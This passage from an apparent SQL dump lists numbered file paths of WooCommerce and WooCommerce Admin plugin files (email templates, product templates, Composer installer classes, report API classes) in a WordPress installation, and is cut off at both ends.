content/plugins/woocommerce/templates/emails/plain/customer-new-account.php'),(4981,'wp-content/plugins/woocommerce/templates/emails/plain/customer-note.php'),(4982,'wp-content/plugins/woocommerce/templates/emails/plain/customer-on-hold-order.php'),(4983,'wp-content/plugins/woocommerce/templates/emails/plain/customer-processing-order.php'),(4984,'wp-content/plugins/woocommerce/templates/emails/plain/customer-refunded-order.php'),(4985,'wp-content/plugins/woocommerce/templates/emails/plain/customer-reset-password.php'),(4986,'wp-content/plugins/woocommerce/templates/emails/plain/email-addresses.php'),(4987,'wp-content/plugins/woocommerce/templates/emails/plain/email-customer-details.php'),(4988,'wp-content/plugins/woocommerce/templates/emails/plain/email-downloads.php'),(4989,'wp-content/plugins/woocommerce/templates/emails/plain/email-order-details.php'),(4990,'wp-content/plugins/woocommerce/templates/emails/plain/email-order-items.php'),(4991,'wp-content/plugins/woocommerce/templates/global/breadcrumb.php'),(4992,'wp-content/plugins/woocommerce/templates/global/form-login.php'),(4993,'wp-content/plugins/woocommerce/templates/global/quantity-input.php'),(4994,'wp-content/plugins/woocommerce/templates/global/sidebar.php'),(4995,'wp-content/plugins/woocommerce/templates/global/wrapper-end.php'),(4996,'wp-content/plugins/woocommerce/templates/global/wrapper-start.php'),(4997,'wp-content/plugins/woocommerce/templates/loop/add-to-cart.php'),(4998,'wp-content/plugins/woocommerce/templates/loop/loop-end.php'),(4999,'wp-content/plugins/woocommerce/templates/loop/loop-start.php'),(5000,'wp-content/plugins/woocommerce/templates/loop/no-products-found.php'),(5001,'wp-content/plugins/woocommerce/templates/loop/orderby.php'),(5002,'wp-content/plugins/woocommerce/templates/loop/pagination.php'),(5003,'wp-content/plugins/woocommerce/templates/loop/price.php'),(5004,'wp-content/plugins/woocommerce/templates/loop/rating.php'),(5005,'wp-content/plugins/woocommerce/templates/loop/result-count.php'),(5006,'wp-content/plugins/woocommerce/templates/loop/sale-flash.php'),(5007,'wp-content/plugins/woocommerce/templates/myaccount/dashboard.php'),(5008,'wp-content/plugins/woocommerce/templates/myaccount/downloads.php'),(5009,'wp-content/plugins/woocommerce/templates/myaccount/form-add-payment-method.php'),(5010,'wp-content/plugins/woocommerce/templates/myaccount/form-edit-account.php'),(5011,'wp-content/plugins/woocommerce/templates/myaccount/form-edit-address.php'),(5012,'wp-content/plugins/woocommerce/templates/myaccount/form-login.php'),(5013,'wp-content/plugins/woocommerce/templates/myaccount/form-lost-password.php'),(5014,'wp-content/plugins/woocommerce/templates/myaccount/form-reset-password.php'),(5015,'wp-content/plugins/woocommerce/templates/myaccount/lost-password-confirmation.php'),(5016,'wp-content/plugins/woocommerce/templates/myaccount/my-account.php'),(5017,'wp-content/plugins/woocommerce/templates/myaccount/my-address.php'),(5018,'wp-content/plugins/woocommerce/templates/myaccount/my-downloads.php'),(5019,'wp-content/plugins/woocommerce/templates/myaccount/my-orders.php'),(5020,'wp-content/plugins/woocommerce/templates/myaccount/navigation.php'),(5021,'wp-content/plugins/woocommerce/templates/myaccount/orders.php'),(5022,'wp-content/plugins/woocommerce/templates/myaccount/payment-methods.php'),(5023,'wp-content/plugins/woocommerce/templates/myaccount/view-order.php'),(5024,'wp-content/plugins/woocommerce/templates/notices/error.php'),(5025,'wp-content/plugins/woocommerce/templates/notices/notice.php'),(5026,'wp-content/plugins/woocommerce/templates/notices/success.php'),(5027,'wp-content/plugins/woocommerce/templates/order/form-tracking.php'),(5028,'wp-content/plugins/woocommerce/templates/order/order-again.php'),(5029,'wp-content/plugins/woocommerce/templates/order/order-details-customer.php'),(5030,'wp-content/plugins/woocommerce/templates/order/order-details-item.php'),(5031,'wp-content/plugins/woocommerce/templates/order/order-details.php'),(5032,'wp-content/plugins/woocommerce/templates/order/order-downloads.php'),(5033,'wp-content/plugins/woocommerce/templates/order/tracking.php'),(5034,'wp-content/plugins/woocommerce/templates/product-searchform.php'),(5035,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/external.php'),(5036,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/grouped.php'),(5037,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/simple.php'),(5038,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variable.php'),(5039,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation-add-to-cart-button.php'),(5040,'wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation.php'),(5041,'wp-content/plugins/woocommerce/templates/single-product/meta.php'),(5042,'wp-content/plugins/woocommerce/templates/single-product/photoswipe.php'),(5043,'wp-content/plugins/woocommerce/templates/single-product/price.php'),(5044,'wp-content/plugins/woocommerce/templates/single-product/product-attributes.php'),(5045,'wp-content/plugins/woocommerce/templates/single-product/product-image.php'),(5046,'wp-content/plugins/woocommerce/templates/single-product/product-thumbnails.php'),(5047,'wp-content/plugins/woocommerce/templates/single-product/rating.php'),(5048,'wp-content/plugins/woocommerce/templates/single-product/related.php'),(5049,'wp-content/plugins/woocommerce/templates/single-product/review-meta.php'),(5050,'wp-content/plugins/woocommerce/templates/single-product/review-rating.php'),(5051,'wp-content/plugins/woocommerce/templates/single-product/review.php'),(5052,'wp-content/plugins/woocommerce/templates/single-product/sale-flash.php'),(5053,'wp-content/plugins/woocommerce/templates/single-product/share.php'),(5054,'wp-content/plugins/woocommerce/templates/single-product/short-description.php'),(5055,'wp-content/plugins/woocommerce/templates/single-product/stock.php'),(5056,'wp-content/plugins/woocommerce/templates/single-product/tabs/additional-information.php'),(5057,'wp-content/plugins/woocommerce/templates/single-product/tabs/description.php'),(5058,'wp-content/plugins/woocommerce/templates/single-product/tabs/tabs.php'),(5059,'wp-content/plugins/woocommerce/templates/single-product/title.php'),(5060,'wp-content/plugins/woocommerce/templates/single-product/up-sells.php'),(5061,'wp-content/plugins/woocommerce/templates/single-product-reviews.php'),(5062,'wp-content/plugins/woocommerce/templates/single-product.php'),(5063,'wp-content/plugins/woocommerce/templates/taxonomy-product_cat.php'),(5064,'wp-content/plugins/woocommerce/templates/taxonomy-product_tag.php'),(5065,'wp-content/plugins/woocommerce/uninstall.php'),(5066,'wp-content/plugins/woocommerce/vendor/autoload.php'),(5067,'wp-content/plugins/woocommerce/vendor/autoload_packages.php'),(5068,'wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/AutoloadGenerator.php'),(5069,'wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/CustomAutoloaderPlugin.php'),(5070,'wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/autoload.php'),(5071,'wp-content/plugins/woocommerce/vendor/composer/ClassLoader.php'),(5072,'wp-content/plugins/woocommerce/vendor/composer/autoload_classmap.php'),(5073,'wp-content/plugins/woocommerce/vendor/composer/autoload_classmap_package.php'),(5074,'wp-content/plugins/woocommerce/vendor/composer/autoload_namespaces.php'),(5075,'wp-content/plugins/woocommerce/vendor/composer/autoload_psr4.php'),(5076,'wp-content/plugins/woocommerce/vendor/composer/autoload_real.php'),(5077,'wp-content/plugins/woocommerce/vendor/composer/autoload_static.php'),(5078,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/AglInstaller.php'),(5079,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/AimeosInstaller.php'),(5080,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/AnnotateCmsInstaller.php'),(5081,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/AsgardInstaller.php'),(5082,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/AttogramInstaller.php'),(5083,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/BaseInstaller.php'),(5084,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/BitrixInstaller.php'),(5085,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/BonefishInstaller.php'),(5086,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CakePHPInstaller.php'),(5087,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ChefInstaller.php'),(5088,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CiviCrmInstaller.php'),(5089,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ClanCatsFrameworkInstaller.php'),(5090,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CockpitInstaller.php'),(5091,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CodeIgniterInstaller.php'),(5092,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Concrete5Installer.php'),(5093,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CraftInstaller.php'),(5094,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/CroogoInstaller.php'),(5095,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/DecibelInstaller.php'),(5096,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/DokuWikiInstaller.php'),(5097,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/DolibarrInstaller.php'),(5098,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/DrupalInstaller.php'),(5099,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ElggInstaller.php'),(5100,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/EliasisInstaller.php'),(5101,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ExpressionEngineInstaller.php'),(5102,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/EzPlatformInstaller.php'),(5103,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/FuelInstaller.php'),(5104,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/FuelphpInstaller.php'),(5105,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/GravInstaller.php'),(5106,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/HuradInstaller.php'),(5107,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ImageCMSInstaller.php'),(5108,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Installer.php'),(5109,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ItopInstaller.php'),(5110,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/JoomlaInstaller.php'),(5111,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KanboardInstaller.php'),(5112,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KirbyInstaller.php'),(5113,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KodiCMSInstaller.php'),(5114,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KohanaInstaller.php'),(5115,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LanManagementSystemInstaller.php'),(5116,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LaravelInstaller.php'),(5117,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LavaLiteInstaller.php'),(5118,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LithiumInstaller.php'),(5119,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MODULEWorkInstaller.php'),(5120,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MODXEvoInstaller.php'),(5121,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MagentoInstaller.php'),(5122,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MajimaInstaller.php'),(5123,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MakoInstaller.php'),(5124,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MauticInstaller.php'),(5125,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MayaInstaller.php'),(5126,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MediaWikiInstaller.php'),(5127,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MicroweberInstaller.php'),(5128,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ModxInstaller.php'),(5129,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MoodleInstaller.php'),(5130,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OctoberInstaller.php'),(5131,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OntoWikiInstaller.php'),(5132,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OsclassInstaller.php'),(5133,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OxidInstaller.php'),(5134,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PPIInstaller.php'),(5135,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PhiftyInstaller.php'),(5136,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PhpBBInstaller.php'),(5137,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PimcoreInstaller.php'),(5138,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PiwikInstaller.php'),(5139,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PlentymarketsInstaller.php'),(5140,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Plugin.php'),(5141,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PortoInstaller.php'),(5142,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PrestashopInstaller.php'),(5143,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PuppetInstaller.php'),(5144,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PxcmsInstaller.php'),(5145,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RadPHPInstaller.php'),(5146,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ReIndexInstaller.php'),(5147,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RedaxoInstaller.php'),(5148,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RoundcubeInstaller.php'),(5149,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SMFInstaller.php'),(5150,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ShopwareInstaller.php'),(5151,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SilverStripeInstaller.php'),(5152,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SiteDirectInstaller.php'),(5153,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SyDESInstaller.php'),(5154,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Symfony1Installer.php'),(5155,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TYPO3CmsInstaller.php'),(5156,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TYPO3FlowInstaller.php'),(5157,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TheliaInstaller.php'),(5158,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TuskInstaller.php'),(5159,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/UserFrostingInstaller.php'),(5160,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/VanillaInstaller.php'),(5161,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/VgmcpInstaller.php'),(5162,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WHMCSInstaller.php'),(5163,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WolfCMSInstaller.php'),(5164,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WordPressInstaller.php'),(5165,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/YawikInstaller.php'),(5166,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ZendInstaller.php'),(5167,'wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ZikulaInstaller.php'),(5168,'wp-content/plugins/woocommerce/vendor/composer/installers/src/bootstrap.php'),(5169,'wp-content/plugins/woocommerce-admin/dist/app/index.js'),(5170,'wp-content/plugins/woocommerce-admin/dist/app/style-rtl.css'),(5171,'wp-content/plugins/woocommerce-admin/dist/app/style.css'),(5172,'wp-content/plugins/woocommerce-admin/dist/components/ie-rtl.css'),(5173,'wp-content/plugins/woocommerce-admin/dist/components/ie.css'),(5174,'wp-content/plugins/woocommerce-admin/dist/components/index.js'),(5175,'wp-content/plugins/woocommerce-admin/dist/components/style-rtl.css'),(5176,'wp-content/plugins/woocommerce-admin/dist/components/style.css'),(5177,'wp-content/plugins/woocommerce-admin/dist/csv-export/index.js'),(5178,'wp-content/plugins/woocommerce-admin/dist/currency/index.js'),(5179,'wp-content/plugins/woocommerce-admin/dist/date/index.js'),(5180,'wp-content/plugins/woocommerce-admin/dist/embedded/index.js'),(5181,'wp-content/plugins/woocommerce-admin/dist/embedded/style-rtl.css'),(5182,'wp-content/plugins/woocommerce-admin/dist/embedded/style.css'),(5183,'wp-content/plugins/woocommerce-admin/dist/navigation/index.js'),(5184,'wp-content/plugins/woocommerce-admin/dist/number/index.js'),(5185,'wp-content/plugins/woocommerce-admin/images/empty-content.svg'),(5186,'wp-content/plugins/woocommerce-admin/images/onboarding/facebook.png'),(5187,'wp-content/plugins/woocommerce-admin/images/onboarding/mailchimp.png'),(5188,'wp-content/plugins/woocommerce-admin/includes/connect-existing-pages.php'),(5189,'wp-content/plugins/woocommerce-admin/includes/core-functions.php'),(5190,'wp-content/plugins/woocommerce-admin/includes/feature-config.php'),(5191,'wp-content/plugins/woocommerce-admin/includes/page-controller-functions.php'),(5192,'wp-content/plugins/woocommerce-admin/languages/woocommerce-admin.php'),(5193,'wp-content/plugins/woocommerce-admin/languages/woocommerce-admin.pot'),(5194,'wp-content/plugins/woocommerce-admin/readme.txt'),(5195,'wp-content/plugins/woocommerce-admin/src/API/Coupons.php'),(5196,'wp-content/plugins/woocommerce-admin/src/API/Customers.php'),(5197,'wp-content/plugins/woocommerce-admin/src/API/Data.php'),(5198,'wp-content/plugins/woocommerce-admin/src/API/DataCountries.php'),(5199,'wp-content/plugins/woocommerce-admin/src/API/DataDownloadIPs.php'),(5200,'wp-content/plugins/woocommerce-admin/src/API/Init.php'),(5201,'wp-content/plugins/woocommerce-admin/src/API/Leaderboards.php'),(5202,'wp-content/plugins/woocommerce-admin/src/API/NoteActions.php'),(5203,'wp-content/plugins/woocommerce-admin/src/API/Notes.php'),(5204,'wp-content/plugins/woocommerce-admin/src/API/OnboardingLevels.php'),(5205,'wp-content/plugins/woocommerce-admin/src/API/OnboardingPlugins.php'),(5206,'wp-content/plugins/woocommerce-admin/src/API/OnboardingProfile.php'),(5207,'wp-content/plugins/woocommerce-admin/src/API/Orders.php'),(5208,'wp-content/plugins/woocommerce-admin/src/API/ProductCategories.php'),(5209,'wp-content/plugins/woocommerce-admin/src/API/ProductReviews.php'),(5210,'wp-content/plugins/woocommerce-admin/src/API/ProductVariations.php'),(5211,'wp-content/plugins/woocommerce-admin/src/API/Products.php'),(5212,'wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/Controller.php'),(5213,'wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/DataStore.php'),(5214,'wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/Query.php'),(5215,'wp-content/plugins/woocommerce-admin/src/API/Reports/Controller.php'),(5216,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Controller.php'),(5217,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/DataStore.php'),(5218,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Query.php'),(5219,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Controller.php'),(5220,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/DataStore.php'),(5221,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Query.php'),(5222,'wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Segmenter.php'),(5223,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Controller.php'),(5224,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/DataStore.php'),(5225,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Query.php'),(5226,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/Controller.php'),(5227,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/DataStore.php'),(5228,'wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/Query.php'),(5229,'wp-content/plugins/woocommerce-admin/src/API/Reports/DataStore.php'),(5230,'wp-content/plugins/woocommerce-admin/src/API/Reports/DataStoreInterface.php'),(5231,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Controller.php'),(5232,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/DataStore.php'),(5233,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Files/Controller.php'),(5234,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Query.php'),(5235,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Stats/Controller.php'),(5236,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Stats/DataStore.php'),(5237,'wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Stats/Query.php'),(5238,'wp-content/plugins/woocommerce-admin/src/API/Reports/Export/Controller.php'),(5239,'wp-content/plugins/woocommerce-admin/src/API/Reports/Import/Controller.php'),(5240,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Controller.php'),(5241,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/DataStore.php'),(5242,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Query.php'),(5243,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Stats/Controller.php'),(5244,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Stats/DataStore.php'),(5245,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Stats/Query.php'),(5246,'wp-content/plugins/woocommerce-admin/src/API/Reports/Orders/Stats/Segmenter.php'),(5247,'wp-content/plugins/woocommerce-admin/src/API/Reports/ParameterException.php'),(5248,'wp-content/plugins/woocommerce-admin/src/API/Reports/PerformanceIndicators/Controller.php'),(5249,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Controller.php'),(5250,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/DataStore.php'),(5251,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Query.php'),(5252,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Stats/Controller.php'),(5253,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Stats/DataStore.php'),(5254,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Stats/Query.php'),(5255,'wp-content/plugins/woocommerce-admin/src/API/Reports/Products/Stats/Segmenter.php'),(5256,'wp-content/plugins/woocommerce-admin/src/API/Reports/Query.php'),(5257,'wp-content/plugins/woocommerce-admin/src/API/Reports/Revenue/Query.php'),(5258,'wp-content/plugins/woocommerce-admin/src/API/Reports/Revenue/Stats/Controller.php'),(5259,'wp-content/plugins/woocommerce-admin/src/API/Reports/Segmenter.php'),(5260,'wp-content/plugins/woocommerce-admin/src/API/Reports/Stock/Controller.php'),(5261,'wp-content/plugins/woocommerce-admin/src/API/Reports/Stock/Stats/Controller.php'),(5262,'wp-content/plugins/woocommerce-admin/src/API/Reports/Stock/Stats/DataStore.php'),(5263,'wp-content/plugins/woocommerce-admin/src/API/Reports/Stock/Stats/Query.php'),(5264,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Controller.php'),(5265,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/DataStore.php'),(5266,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Query.php'),(5267,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Stats/Controller.php'),(5268,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Stats/DataStore.php'),(5269,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Stats/Query.php'),(5270,'wp-content/plugins/woocommerce-admin/src/API/Reports/Taxes/Stats/Segmenter.php'),(5271,'wp-content/plugins/woocommerce-admin/src/API/Reports/TimeInterval.php'),(5272,'wp-content/plugins/woocommerce-admin/src/API/Reports/Variations/Controller.php'),(5273,'wp-content/plugins/woocommerce-admin/src/API/Reports/Variations/DataStore.php'),(5274,'wp-content/plugins/woocommerce-admin/src/API/Reports/Variations/Query.php'),(5275,'wp-content/plugins/woocommerce-admin/src/API/SettingOptions.php'),(5276,'wp-content/plugins/woocommerce-admin/src/API/Taxes.php'),(5277,'wp-content/plugins/woocommerce-admin/src/API/Themes.php'),(5278,'wp-content/plugins/woocommerce-admin/src/Events.php'),(5279,'wp-content/plugins/woocommerce-admin/src/FeaturePlugin.php'),(5280,'wp-content/plugins/woocommerce-admin/src/Features/ActivityPanels.php'),(5281,'wp-content/plugins/woocommerce-admin/src/Features/Analytics.php'),(5282,'wp-content/plugins/woocommerce-admin/src/Features/AnalyticsDashboard.php'),(5283,'wp-content/plugins/woocommerce-admin/src/Features/Onboarding.php'),(5284,'wp-content/plugins/woocommerce-admin/src/Features/OnboardingTasks.php'),(5285,'wp-content/plugins/woocommerce-admin/src/Install.php'),(5286,'wp-content/plugins/woocommerce-admin/src/Loader.php'),(5287,'wp-content/plugins/woocommerce-admin/src/Notes/DataStore.php'),(5288,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Note.php'),(5289,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes.php'),(5290,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Giving_Feedback_Notes.php'),(5291,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Historical_Data.php'),(5292,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Mobile_App.php'),(5293,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_New_Sales_Record.php'),(5294,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Order_Milestones.php'),(5295,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Settings_Notes.php'),(5296,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Welcome_Message.php'),(5297,'wp-content/plugins/woocommerce-admin/src/Notes/WC_Admin_Notes_Woo_Subscriptions_Notes.php'),(5298,'wp-content/plugins/woocommerce-admin/src/Overrides/Order.php'),(5299,'wp-content/plugins/woocommerce-admin/src/Overrides/OrderRefund.php'),(5300,'wp-content/plugins/woocommerce-admin/src/Overrides/OrderTraits.php'),(5301,'wp-content/plugins/woocommerce-admin/src/Overrides/ThemeUpgrader.php'),(5302,'wp-content/plugins/woocommerce-admin/src/Overrides/ThemeUpgraderSkin.php'),(5303,'wp-content/plugins/woocommerce-admin/src/Overrides/WPPostStore.php'),(5304,'wp-content/plugins/woocommerce-admin/src/PageController.php'),(5305,'wp-content/plugins/woocommerce-admin/src/ReportCSVExporter.php'),(5306,'wp-content/plugins/woocommerce-admin/src/ReportExporter.php'),(5307,'wp-content/plugins/woocommerce-admin/src/ReportsSync.php'),(5308,'wp-content/plugins/woocommerce-admin/uninstall.php'),(5309,'wp-content/plugins/woocommerce-admin/vendor/autoload.php'),(5310,'wp-content/plugins/woocommerce-admin/vendor/composer/ClassLoader.php'),(5311,'wp-content/plugins/woocommerce-admin/vendor/composer/LICENSE'),(5312,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_classmap.php'),(5313,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_files.php'),(5314,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_namespaces.php'),(5315,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_psr4.php'),(5316,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_real.php'),(5317,'wp-content/plugins/woocommerce-admin/vendor/composer/autoload_static.php'),(5318,'wp-content/plugins/woocommerce-admin/vendor/composer/installed.json'),(5319,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/LICENSE'),(5320,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/composer.json'),(5321,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/AglInstaller.php'),(5322,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/AimeosInstaller.php'),(5323,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/AnnotateCmsInstaller.php'),(5324,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/AsgardInstaller.php'),(5325,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/AttogramInstaller.php'),(5326,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/BaseInstaller.php'),(5327,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/BitrixInstaller.php'),(5328,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/BonefishInstaller.php'),(5329,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/CakePHPInstaller.php'),(5330,'wp-content/plugins/woocommerce-admin/vendor/composer/installers/src/Composer/Installers/C